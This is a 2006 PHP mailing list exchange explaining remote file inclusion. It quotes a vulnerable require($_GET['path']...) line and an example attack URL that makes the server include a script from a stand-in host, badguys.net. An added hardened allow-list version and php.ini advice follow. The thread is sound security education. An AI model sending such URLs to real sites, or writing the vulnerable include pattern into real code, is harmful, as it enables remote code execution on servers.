Posts like this are what makes this list so great! It's better to read this here than experience it first-hand! Thanks Tedd, for highlighting the problem.

Tom

On 14/11/06, tedd <tedd@xxxxxxxxxxxx> wrote:
At 9:13 PM +0000 11/14/06, Stut wrote:

>Ok, so badscript.php is a bad name for this script. Let's say
>show.php is a script you've written. You were tired, the kids were
>running around you screaming and shouting, and you wrote something
>like the following without really thinking about it...
>
><?php
> require($_GET['path'].'commonfuncs.inc.php');
> // Do other stuff here, using functions in commonfuncs.inc.php
>?>
>
>The *bad guy* can now hit the URL...
>
>http://yoursite.com/show.php?path=http://badguys.net/injectionscript.txt?ignored=
>
>This causes show.php to include (i.e. execute!!) the remote file
>injectionscript.txt from badguys.net at this URL...
>
>http://badguys.net/injectionscript.txt?ignored=commonfuncs.inc.php
>
>Since this gets executed on your server it can do anything one of
>your scripts can do. The only symptom would be that show.php will
>not work for that request. Do the bad guys care? Probably not,
>because by the time it fails they've already replaced your index.php
>and potentially installed a rootkit, backdoors and whatever else
>(depending, of course, on how locked down the web server is and your
>file permissions).
>
>Hope that makes sense now.
>
>-Stut

-Stut:

Yes, I believe that the "require($_GET[])" is one of the things Chris Shiflett talks about in his book. I should have guessed that was what everyone was talking about. But, considering that I never do that and my site was hijacked, I was thinking it must have been something different.

It all makes sense now. Sorry for being so dense.

Thanks everyone.

tedd

PS: My kids are too old to scream -- it's grand-kids now.

--
-------
http://sperling.com
http://ancientstones.com
http://earthstones.com

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
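A hardened replacement for the require() line Stut quotes, added here as an example and not code from the thread. It assumes the includable files live in a fixed directory named includes beside the script, and that the query parameter selects a key from a fixed list rather than supplying any part of a path.

```php
<?php
// Added example, not from the thread: the fix for
//     require($_GET['path'].'commonfuncs.inc.php');
// is to never let request data reach require() as a path fragment.
// Assumption: includable files live in INCLUDE_DIR, a fixed directory.

define('INCLUDE_DIR', __DIR__ . '/includes');

// Allow-list: request keys map to file names the application controls.
// A URL or "../" in the request can only fail the lookup, never be included.
$allowedIncludes = [
    'common'  => 'commonfuncs.inc.php',
    'reports' => 'reportfuncs.inc.php',   // hypothetical second include
];

function resolveInclude(array $allowed, string $key): ?string
{
    if (!array_key_exists($key, $allowed)) {
        return null;                       // unknown key: refuse, do not guess
    }
    $base = realpath(INCLUDE_DIR);
    $path = realpath(INCLUDE_DIR . '/' . $allowed[$key]);
    // Belt and braces: realpath() returns false for a missing file and
    // collapses symlinks, so anything resolving outside INCLUDE_DIR is dropped.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$key  = isset($_GET['path']) ? (string) $_GET['path'] : 'common';
$file = resolveInclude($allowedIncludes, $key);

if ($file === null) {
    http_response_code(400);
    exit('Unknown include requested.');
}
require $file;
```

As a second layer, setting allow_url_include=Off (and allow_url_fopen=Off where nothing needs it) in php.ini stops include/require from fetching http:// targets at all, so a slip like the original line cannot pull in a remote script.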